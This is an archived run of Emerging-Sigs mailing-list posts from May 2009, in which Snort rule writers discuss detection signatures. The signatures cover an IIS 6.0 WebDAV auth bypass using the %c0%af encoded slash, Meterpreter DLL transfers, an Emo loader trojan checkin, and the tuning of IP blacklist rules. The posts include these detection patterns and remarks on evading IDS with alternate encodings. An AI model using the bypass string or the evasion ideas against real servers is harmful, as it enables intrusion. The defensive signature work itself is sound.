On May 18, 2009, at 4:35 PM, Jules Pagna Disso wrote:

hi guys,

is there a way we can identify traffic behind a proxy server? / identify that a proxy server is being used?

I assume that someone is trying to bypass some restrictions of some sort.

do we have a rule for that? or no solution?

thanks,
Jules

From juanma at ossim.net Tue May 19 10:36:42 2009
From: juanma at ossim.net (Juan Manuel Lorenzo)
Date: Tue, 19 May 2009 16:36:42 +0200
Subject: [Emerging-Sigs] IP address on Spamhaus (Spam BlackList)
In-Reply-To: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
References: <53834cf20905040755i1686ab10qd328d057957f089@mail.gmail.com>
Message-ID:

This rule is being quite useful for us in some environments: when one machine has been infected by any malware and it starts sending spam, in just a few minutes we see that the IP address has been blocked in Spamhaus.
Juan Manuel Lorenzo On Mon, May 4, 2009 at 4:55 PM, Jaime Blasco wrote: > Hi! > > I've been analyzing some spam traffic, related to snort's rule: > policy.rules:alert tcp $SMTP_SERVERS 25 -> $EXTERNAL_NET any (msg:"POLICY > SMTP relaying denied"; flow:established,from_server; content:"550 5.7.1"; > depth:70; reference:arachnids,249; reference:url, > mail-abuse.org/tsi/ar-fix.html; classtype:misc-activity; sid:567; rev:11;) > > we could write a rule to detect smtp responses like this: > 553 Mail from *.*.* not allowed - 5.7.1 [BL23] Connections not accepted > from IP addresses on Spamhaus XBL; see > http://postmaster.yahoo.com/550-bl23.html [550] > > alert tcp $EXTERNAL_NET 25 -> $HOME_NET any (msg:"ET POLICY IP address > BlackListed (Spamhaus)"; flow:established,from_server; content:"553 Mail > from"; content:"Spamhaus XBL"; classtype:misc-activity; sid:; rev:1;) > > Regards > > -- > _______________________________ > > Jaime Blasco > > www.ossim.com > www.alienvault.com > Email: jaime.blasco at alienvault.com > > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/f8c7efb8/attachment.html From jgimer at gmail.com Tue May 19 11:54:35 2009 From: jgimer at gmail.com (Joshua Gimer) Date: Tue, 19 May 2009 09:54:35 -0600 Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass In-Reply-To: <1242536118.7390.20.camel@kinta> References: <1242536118.7390.20.camel@kinta> Message-ID: Translate: f is required when performing the GET method of attack, it is NOT required when using the PROPFIND method. On Sat, May 16, 2009 at 10:55 PM, dxp wrote: > The text by Kingcope on milw0rm does specify the "translage: f" header in > the first two examples.? 
I have not tested this but it appears, if I read > the advisory correctly, that this additional header is required to exploit > the vulnerability.? Without it the signature would pick up on many different > web scans and woulld not be specific to this vulnerability. > > - > > -=[ dxp ]=- > 0xA3F3C6E3 > > > > On Sat, 2009-05-16 at 17:13 -0400, Nick Randolph wrote: > > I'm submitting this for the recent IIS 6.0 vulnerability > http://isc.sans.org/diary.html?storyid=6397 > > alert tcp $EXTERNAL_NET any -> $HOME_NET 80 (msg:"IIS6.0 WebDav Remote > Auth Bypass"; flow:established,to_server; uricontent:"|25|c0|25|af"; > nocase; reference:url,isc.sans.org/diary.html?storyid=6397; > sid:xxxxxx; gid:1; rev:1;) > > I also read that "translate: f" was required but the information on > milw0rm.com did not use that in all 3 examples. > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > _______________________________________________ > Emerging-sigs mailing list > Emerging-sigs at emergingthreats.net > http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs > > -- Thx Joshua Gimer From frank at knobbe.us Tue May 19 15:32:13 2009 From: frank at knobbe.us (Frank Knobbe) Date: Tue, 19 May 2009 14:32:13 -0500 Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass In-Reply-To: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com> References: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com> Message-ID: <1242761533.4200.4.camel@localhost> On Mon, 2009-05-18 at 13:01 -0300, Rodrigo Montoro(Sp0oKeR) wrote: > http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html So is %c0%af the only 16 bit Unicode sequence resulting in a "/"? (i doubt it). Is this an issue with Unicode encoding in general or "%c0%af" in particular? Cheers, Frank -- It is said that the Internet is a public utility. 
As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 188 bytes Desc: This is a digitally signed message part Url : http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20090519/c0ea24fb/attachment.bin From jonkman at jonkmans.com Tue May 19 15:35:45 2009 From: jonkman at jonkmans.com (Matt Jonkman) Date: Tue, 19 May 2009 15:35:45 -0400 Subject: [Emerging-Sigs] Metasploit's Meterpreter detection In-Reply-To: References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net> <1242680123.6901.11.camel@kinta> <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com> Message-ID: <4A130A11.9030601@jonkmans.com> You want me to post this one now, or wait for the full list Shirk? Thanks, great idea! Matt Shirk Dog wrote: > Well I was working on a FULL list of all of the Meterpreter commands, as > they are static for now. The signatures were going to follow when I was > done, about 20 of them. > > > Shirkdog > Free your mind... > http://www.shirkdog.us > > > >> Date: Mon, 18 May 2009 15:02:49 -0700 >> From: phatbuckett at gmail.com >> To: dxp2532 at gmail.com >> CC: emerging-sigs at emergingthreats.net >> Subject: Re: [Emerging-Sigs] Metasploit's Meterpreter detection >> >> Interested also to know if the any/any port spec can be narrowed with >> some modifiers on the content check. I'm supposing not. :) >> >> DS >> >> On Mon, May 18, 2009 at 1:55 PM, dxp wrote: >> > It's a very good idea. It's definitely worth knowing what was thrown at >> > you. >> > Have you tested this for False Positives? What specifically those bytes >> > represent from the DLL? 
>> >
>> > -
>> >
>> > -=[ dxp ]=-
>> > 0xA3F3C6E3
>> >
>> > On Mon, 2009-05-18 at 20:41 +0000, ccentore at comcast.net wrote:
>> >
>> > This rule detects the transfer of the metsrv.dll file. It somewhat overlaps with rule 200419 / "ET POLICY PE EXE or DLL Windows file download", but I thought it might be a decent inclusion since, once downloaded, the metsrv.dll typically stays in memory and can be difficult to find if you don't know you are looking for it.
>> >
>> > alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"Meterpreter metsrv.dll downloaded"; flow: established; content:"|DB 39 45 FC 0F 94 C0 89 45 FC D1 E9 85|"; classtype:xxxxx; reference:url,www.metasploit.com/documents/meterpreter.pdf; sid: xxxxx; rev:1;)
>> >
>>
>> --
>> Darren Spruell
>> phatbuckett at gmail.com
>
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jonkman at jonkmans.com Tue May 19 15:37:55 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 15:37:55 -0400
Subject: [Emerging-Sigs] reference for sid:2008134
In-Reply-To:
References:
Message-ID: <4A130A93.1050702@jonkmans.com>

Got it, thanks Russell!

matt

Russell Fulton wrote:
> reference:url,http://www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403
>
> I've added it to the wiki. Might be worth adding to the rule. URL and site match exactly...
>
> Russell

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From frank at knobbe.us Tue May 19 15:40:18 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 14:40:18 -0500
Subject: [Emerging-Sigs] Metasploit's Meterpreter detection
In-Reply-To: <4A130A11.9030601@jonkmans.com>
References: <1407119032.10953161242679267645.JavaMail.root@sz0098a.emeryville.ca.mail.comcast.net> <1242680123.6901.11.camel@kinta> <839aec700905181502q2b78f39fge53682e3cf8f031e@mail.gmail.com> <4A130A11.9030601@jonkmans.com>
Message-ID: <1242762018.4200.6.camel@localhost>

On Tue, 2009-05-19 at 15:35 -0400, Matt Jonkman wrote:
> You want me to post this one now, or wait for the full list Shirk?

I'd say let's wait for the full list. It's likely to only be useful for SMB based transfer of the code. Pretty much anyone would use evasion techniques, like gzip'ed HTTP (or SSL) anyway. HTTP is easy to evade while there are probably less possibilities with SMB.

-Frank

--
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.
From frank at knobbe.us Tue May 19 15:41:17 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 14:41:17 -0500
Subject: [Emerging-Sigs] reference for sid:2008134
In-Reply-To: <4A130A93.1050702@jonkmans.com>
References: <4A130A93.1050702@jonkmans.com>
Message-ID: <1242762077.4200.7.camel@localhost>

On Tue, 2009-05-19 at 15:37 -0400, Matt Jonkman wrote:
> Got it, thanks Russell!

I didn't add it since I wasn't sure if that really applies to that sig ("General" downloader). Looks like it won't be general anymore :)

-Frank

--
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.

From jonkman at jonkmans.com Tue May 19 16:00:05 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 16:00:05 -0400
Subject: [Emerging-Sigs] 2008546 = emo loader
In-Reply-To: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com>
References: <839aec700905151815v243086c4oc2ec520cac48b360@mail.gmail.com>
Message-ID: <4A130FC5.5040607@jonkmans.com>

Ya, we never did put part 2 up. Or removed it, or whatever. Adjusting the name and adding the reference.

Thanks Darren!
matt

Darren Spruell wrote:
> Existing rule:
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Downloader.vr Checkin part 1 of 2"; flow:established,to_server; content:"GET "; depth:4; uricontent:".php"; uricontent:"v="; uricontent:"&rs="; uricontent:"&n="; uricontent:"&uid="; classtype:trojan-activity; reference:url,doc.emergingthreats.net/2008546; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General; sid:2008546; rev:3;)
>
> This is commonly known as Emo loader (e.g. http://www.malwaredomainlist.com/mdl.php?search=emo+&colsearch=All&quantity=50), if a rule message update is OK.
>
> Also, by the message text, is there supposed to be an accompanying part 2 of 2 anywhere?

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From emerging at emergingthreats.net Tue May 19 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue, 19 May 2009 16:00:12 -0400 (EDT)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20090519200012.C1F944504D@goliath.jonkmans.com>

[***] Results from Oinkmaster started Tue May 19 16:00:12 2009 [***]

[///] Modified active rules: [///]

    2008134 - ET TROJAN Common Downloader Install Count Tracking URL (partner) (emerging-virus.rules)

[+++] Added non-rule lines: [+++]

    -> Added to emerging-sid-msg.map (3):
       2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403 || url,doc.emergingthreats.net/2008134
       2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

    -> Added to emerging-sid-msg.map.txt (3):
       2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,www.threatexpert.com/report.aspx?md5=ea70e0971cc490a15e53d24ad6564403 || url,doc.emergingthreats.net/2008134
       2500144 || ET COMPROMISED Known Compromised or Hostile Host Traffic (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
       2510144 || ET COMPROMISED Known Compromised or Hostile Host Traffic - BLOCKING (145) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

[---] Removed non-rule lines: [---]

    -> Removed from emerging-sid-msg.map (1):
       2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2008134

    -> Removed from emerging-sid-msg.map.txt (1):
       2008134 || ET TROJAN Common Downloader Install Count Tracking URL (partner) || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/VIRUS/TROJAN_Downloader_General || url,doc.emergingthreats.net/2008134

From jonkman at jonkmans.com Tue May 19 16:58:41 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 16:58:41 -0400
Subject: [Emerging-Sigs] IP List rulesets
Message-ID: <4A131D81.3040907@jonkmans.com>

I've updated the scripts that generate the IP lists rulesets to separate into TCP and UDP rulesets. This has shown in a number of tests (contrary to expectations) to have a significant performance improvement.

Please test them out and let me know both if they're accurate and if you see any performance gains!
Thanks

Matt

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From eslerj at gmail.com Tue May 19 17:01:40 2009
From: eslerj at gmail.com (Joel Esler)
Date: Tue, 19 May 2009 17:01:40 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A131D81.3040907@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
Message-ID: <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>

http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html

J

On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman wrote:
> I've updated the scripts that generate the IP lists rulesets to separate into TCP and UDP rulesets. This has shown in a number of tests (contrary to expectations) to have a significant performance improvement.
>
> Please test them out and let me know both if they're accurate and if you see any performance gains!
>
> Thanks
>
> Matt
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>

--
joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
From jonkman at jonkmans.com Tue May 19 17:14:18 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 17:14:18 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>
References: <4A131D81.3040907@jonkmans.com> <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com>
Message-ID: <4A13212A.9010100@jonkmans.com>

Thanks Joel. Definitely good stuff, thanks Marty!

Think that'll end up going into the main tree?

Matt

Joel Esler wrote:
> http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html
>
> J
>
> On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman wrote:
>
> I've updated the scripts that generate the IP lists rulesets to separate into TCP and UDP rulesets. This has shown in a number of tests (contrary to expectations) to have a significant performance improvement.
>
> Please test them out and let me know both if they're accurate and if you see any performance gains!
>
> Thanks
>
> Matt
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
> --
> joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
>

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From mcholste at gmail.com Tue May 19 17:14:18 2009
From: mcholste at gmail.com (Martin Holste)
Date: Tue, 19 May 2009 16:14:18 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To: <1242761533.4200.4.camel@localhost>
References: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com> <1242761533.4200.4.camel@localhost>
Message-ID:

I'm still unclear on how any signature dealing with encoded chars should be written for uricontent with normalization.

On Tue, May 19, 2009 at 2:32 PM, Frank Knobbe wrote:
> On Mon, 2009-05-18 at 13:01 -0300, Rodrigo Montoro(Sp0oKeR) wrote:
> > http://blog.zoller.lu/2009/05/iis-6-webdac-auth-bypass-and-data.html
>
> So is %c0%af the only 16 bit Unicode sequence resulting in a "/"? (I doubt it). Is this an issue with Unicode encoding in general or "%c0%af" in particular?
>
> Cheers,
> Frank
>
> --
> It is said that the Internet is a public utility.
> As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.
>

From frank at knobbe.us Tue May 19 17:20:35 2009
From: frank at knobbe.us (Frank Knobbe)
Date: Tue, 19 May 2009 16:20:35 -0500
Subject: [Emerging-Sigs] IIS 6.0 WebDav Remote Auth Bypass
In-Reply-To:
References: <9255886c0905180901u6abd75abh945c5b281ea08278@mail.gmail.com> <1242761533.4200.4.camel@localhost>
Message-ID: <1242768035.4200.28.camel@localhost>

On Tue, 2009-05-19 at 16:14 -0500, Martin Holste wrote:
> I'm still unclear on how any signature dealing with encoded chars should be written for uricontent with normalization.

It won't work with uricontent as it normalizes "%c0%af" into "/". So a content match is in order that can fixate *this particular sequence* between GET|POST|... and the trailing HTTP/1. Maybe with a pcre assist.

But, if any Unicode that forms a "/" causes this problem (which is my guess based on the description), then of course this is useless and will only detect the brain-dead script kiddies using the milw0rm exploit unchanged. And even if we create a couple hundred sigs for "/" in all their Unicode forms.... why not just use a "%xx%xx" that translates into a dot to fly by the IDS? :]

Cheers,
Frank

--
It is said that the Internet is a public utility. As such, it is best compared to a sewer. A big, fat pipe with a bunch of crap sloshing against your ports.
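Frank's point above (uricontent sees the URI after normalization, so the raw "%c0%af" bytes are no longer there, while a content match or a pcre with the /B flag still sees the raw request line) as an added example, not code from the thread and not Snort's http_inspect: a simplified two-pass normalizer, a constructed request, and the hypothetical helpers uricontent_match, raw_content_match and raw_pcre_match modelling the three rule options.

```python
"""Why a uricontent match on the raw bytes "%c0%af" misses after URI
normalization, while a content match (or pcre with /B) on the raw
request line still fires.

Added example: a simplified model of an HTTP-inspecting IDS normalizer,
NOT Snort's http_inspect code. The sample request below is constructed."""
import re

# Constructed request: the overlong sequence sits inside an ordinary path;
# the point demonstrated is the normalization, not any particular target.
RAW_REQUEST = (b"GET /pub%c0%afdocs/index.htm HTTP/1.1\r\n"
               b"Host: iis.example.test\r\n\r\n")

HEX2 = re.compile(rb"[0-9A-Fa-f]{2}")


def percent_decode(uri: bytes) -> bytes:
    """First normalization pass: turn each %XX escape into its raw byte.
    Malformed escapes (%zz, a trailing %4) are left untouched."""
    out = bytearray()
    i = 0
    while i < len(uri):
        if uri[i:i + 1] == b"%" and HEX2.fullmatch(uri[i + 1:i + 3]):
            out.append(int(uri[i + 1:i + 3], 16))
            i += 3
        else:
            out.append(uri[i])
            i += 1
    return bytes(out)


def lenient_utf8(data: bytes) -> bytes:
    """Second pass: decode two-byte UTF-8 sequences, accepting the overlong
    forms (lead byte 0xC0/0xC1) that a strict decoder would reject. A code
    point below 0x80 is emitted as its ASCII byte; anything else is kept."""
    out = bytearray()
    i = 0
    while i < len(data):
        b0 = data[i]
        if 0xC0 <= b0 <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            cp = ((b0 & 0x1F) << 6) | (data[i + 1] & 0x3F)
            if cp < 0x80:
                out.append(cp)          # overlong encoding of an ASCII character
            else:
                out += data[i:i + 2]    # a genuine non-ASCII character, kept as-is
            i += 2
        else:
            out.append(b0)
            i += 1
    return bytes(out)


def normalized_uri(request: bytes) -> bytes:
    """The buffer a uricontent match sees: the URI after both passes."""
    request_line = request.split(b"\r\n", 1)[0]
    uri = request_line.split(b" ")[1]
    return lenient_utf8(percent_decode(uri))


def uricontent_match(request: bytes, pattern: bytes) -> bool:
    """Model of uricontent with nocase: match against the normalized URI."""
    return pattern.lower() in normalized_uri(request).lower()


def raw_content_match(request: bytes, pattern: bytes) -> bool:
    """Model of a plain content match with nocase: against the raw payload."""
    return pattern.lower() in request.lower()


def raw_pcre_match(request: bytes, pattern: bytes) -> bool:
    """Model of pcre:"/.../Bi": case-insensitive regex on the raw payload."""
    return re.search(pattern, request, re.IGNORECASE) is not None


if __name__ == "__main__":
    print("normalized URI :", normalized_uri(RAW_REQUEST))
    print("uricontent hit :", uricontent_match(RAW_REQUEST, b"%c0%af"))
    print("content hit    :", raw_content_match(RAW_REQUEST, b"%c0%af"))
    print("pcre /B hit    :", raw_pcre_match(RAW_REQUEST, rb"GET.*%..%.*HTTP"))
```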
From jesler at sourcefire.com Tue May 19 17:45:15 2009
From: jesler at sourcefire.com (Joel Esler)
Date: Tue, 19 May 2009 17:45:15 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A13212A.9010100@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com> <314cf0830905191401x4af6045cu3763917297753633@mail.gmail.com> <4A13212A.9010100@jonkmans.com>
Message-ID: <7949F358-7F72-4E89-A98E-98730D7049B1@sourcefire.com>

Marty comments on that very thing in the post of his blog.

--
Joel Esler
Sent from my iDevice

On May 19, 2009, at 5:14 PM, Matt Jonkman wrote:
> Thanks Joel. Definitely good stuff, thanks Marty!
>
> Think that'll end up going into the main tree?
>
> Matt
>
> Joel Esler wrote:
>> http://securitysauce.blogspot.com/2009/05/ip-blacklisting-for-snort-2841.html
>>
>> J
>>
>> On Tue, May 19, 2009 at 4:58 PM, Matt Jonkman wrote:
>>
>> I've updated the scripts that generate the IP lists rulesets to separate into TCP and UDP rulesets. This has shown in a number of tests (contrary to expectations) to have a significant performance improvement.
>>
>> Please test them out and let me know both if they're accurate and if you see any performance gains!
>>
>> Thanks
>>
>> Matt
>>
>> --
>> --------------------------------------------
>> Matthew Jonkman
>> Emerging Threats
>> Phone 765-429-0398
>> Fax 312-264-0205
>> http://www.emergingthreats.net
>> --------------------------------------------
>>
>> PGP: http://www.jonkmans.com/mattjonkman.asc
>>
>>
>> --
>> joel esler | Sourcefire | gtalk: jesler at sourcefire.com | 302-223-5974
>>
>
> --
> --------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> --------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>

From eoin.miller at trojanedbinaries.com Tue May 19 18:28:21 2009
From: eoin.miller at trojanedbinaries.com (Eoin Miller)
Date: Tue, 19 May 2009 18:28:21 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A131D81.3040907@jonkmans.com>
References: <4A131D81.3040907@jonkmans.com>
Message-ID: <4A133285.1060104@trojanedbinaries.com>

Matt,

In our testing/breakup/optimization of the IP List rules (RBN/BotCC/compromised/DShield), we did this a little differently for the TCP rules.
Vanilla TCP rule (Example):
alert tcp [] any -> $HOME_NET any (msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)

Modified TCP rule (Example):
alert tcp $HOME_NET any -> [] any (flags: S; msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)

The modified rule looks for the TCP SYN flag to be set in addition to $HOME_NET contacting the RBN's known IPs. This significantly decreases the processor load because Snort will only compare the SRC/DST address lists *if* the TCP SYN is set (or so it appears?). When you have a large $HOME_NET, this appears to become even more important. Also, you may notice we flipped the flow of traffic from $HOME_NET to the RBN servers in our rule. This is because for us, we are monitoring NAT'd hosts behind firewalls and are concerned more with our internal hosts reaching out and attempting to establish a TCP session to potentially dangerous sites that are doing drive by/malware hosting/phishing or reaching out to potential C&C servers hosted by RBN. We are less concerned with RBN sites attempting to connect in and create TCP sessions to our clients' desktop systems as they are NAT'd behind a firewall.

We also created an additional rule set to cover ICMP communications just to keep tabs if anything starts communicating over it for some reason.
Again, please note that the SRC/DST have been flipped:

New ICMP rule (Example):
alert icmp $HOME_NET any -> [] any (msg:"ET RBN Known Russian Business Network IP ICMP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)

We benchmarked the old RBN ruleset (which used "alert ip" type rules) against the new one we created (using "alert tcp" w/TCP SYN flag and "alert udp") using a 25GB pcap traffic capture.

Rule Types    | Time To Process 25GB of PCAP
--------------+-----------------------------
alert ip      | 1 hour, 3 minutes, 4 seconds
alert tcp/udp | 11 minutes, 43 seconds

Additionally, the disk could not shove packets fast enough at Snort to process the alert tcp/udp rule sets. The Snort instance only ran at about 75% processor utilization during its super short 11 minutes of processing. The processor was pegged at 100% during the alert ip rules which took 1 hour. At our client site, we used to have to break up the RBN rule list into two separate rule lists/instances of Snort just to monitor a 300MBit/s link without dropping packets in Snort (compiled against MMAP LibPcap). This was for the RBN list ONLY. Now we can run almost all of the IP list rules on a single processor core/instance of Snort @ 300MBit/s without dropping even 0.01% of packets.

It should be noted we are not running Snort in-line and these sigs should really be for people running in purely IDS mode. Marty's new super sweet IP BlackList preproc seems to be the way to go for those of you that are running in-line.
--
Eoin Miller
eoin.miller at trojanedbinaries.com

From jonkman at jonkmans.com Tue May 19 18:52:43 2009
From: jonkman at jonkmans.com (Matt Jonkman)
Date: Tue, 19 May 2009 18:52:43 -0400
Subject: [Emerging-Sigs] IP List rulesets
In-Reply-To: <4A133285.1060104@trojanedbinaries.com>
References: <4A131D81.3040907@jonkmans.com> <4A133285.1060104@trojanedbinaries.com>
Message-ID: <4A13383B.1000608@jonkmans.com>

Very good point on the Syn flag. I've added that to all of the tcp sigs. That could alone be a good chunk of the performance gain I'd guess.

On reversing the order, I agree there. I wish I'd originally made these sigs for home_net -> outside. But I'm hesitant to change it now as many folks have blocking built on the assumed hostile source.

Matt

Eoin Miller wrote:
> Matt,
>
> In our testing/breakup/optimization of the IP List rules (RBN/BotCC/compromised/DShield), we did this a little differently for the TCP rules.
>
> Vanilla TCP rule (Example):
> alert tcp [] any -> $HOME_NET any (msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>
> Modified TCP rule (Example):
> alert tcp $HOME_NET any -> [] any (flags: S; msg:"ET RBN Known Russian Business Network IP TCP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>
> The modified rule looks for the TCP SYN flag to be set in addition to $HOME_NET contacting the RBN's known IPs. This significantly decreases the processor load because Snort will only compare the SRC/DST address lists *if* the TCP SYN is set (or so it appears?). When you have a large $HOME_NET, this appears to become even more important.
> Also, you may notice we flipped the flow of traffic from $HOME_NET to the RBN servers in our rule. This is because for us, we are monitoring NAT'd hosts behind firewalls and are concerned more with our internal hosts reaching out and attempting to establish a TCP session to potentially dangerous sites that are doing drive by/malware hosting/phishing or reaching out to potential C&C servers hosted by RBN. We are less concerned with RBN sites attempting to connect in and create TCP sessions to our clients' desktop systems as they are NAT'd behind a firewall.
>
> We also created an additional rule set to cover ICMP communications just to keep tabs if anything starts communicating over it for some reason. Again, please note that the SRC/DST have been flipped:
>
> New ICMP rule (Example):
> alert icmp $HOME_NET any -> [] any (msg:"ET RBN Known Russian Business Network IP ICMP (1)"; reference:url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork; threshold: type limit, track by_src, seconds 60, count 1; classtype:misc-attack; sid:2406000; rev:129;)
>
> We benchmarked the old RBN ruleset (which used "alert ip" type rules) against the new one we created (using "alert tcp" w/TCP SYN flag and "alert udp") using a 25GB pcap traffic capture.
>
> Rule Types    | Time To Process 25GB of PCAP
> --------------+-----------------------------
> alert ip      | 1 hour, 3 minutes, 4 seconds
> alert tcp/udp | 11 minutes, 43 seconds
>
> Additionally, the disk could not shove packets fast enough at Snort to process the alert tcp/udp rule sets. The Snort instance only ran at about 75% processor utilization during its super short 11 minutes of processing. The processor was pegged at 100% during the alert ip rules which took 1 hour. At our client site, we used to have to break up the RBN rule list into two separate rule lists/instances of Snort just to monitor a 300MBit/s link without dropping packets in Snort (compiled against MMAP LibPcap).
> This was for the RBN list ONLY. Now we can run almost all of the IP list rules on a single processor core/instance of Snort @ 300MBit/s without dropping even 0.01% of packets.
>
> It should be noted we are not running Snort in-line and these sigs should really be for people running in purely IDS mode. Marty's new super sweet IP BlackList preproc seems to be the way to go for those of you that are running in-line.
>
> --
> Eoin Miller
> eoin.miller at trojanedbinaries.com

--
--------------------------------------------
Matthew Jonkman
Emerging Threats
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
--------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc

From jgimer at gmail.com Tue May 19 19:48:48 2009
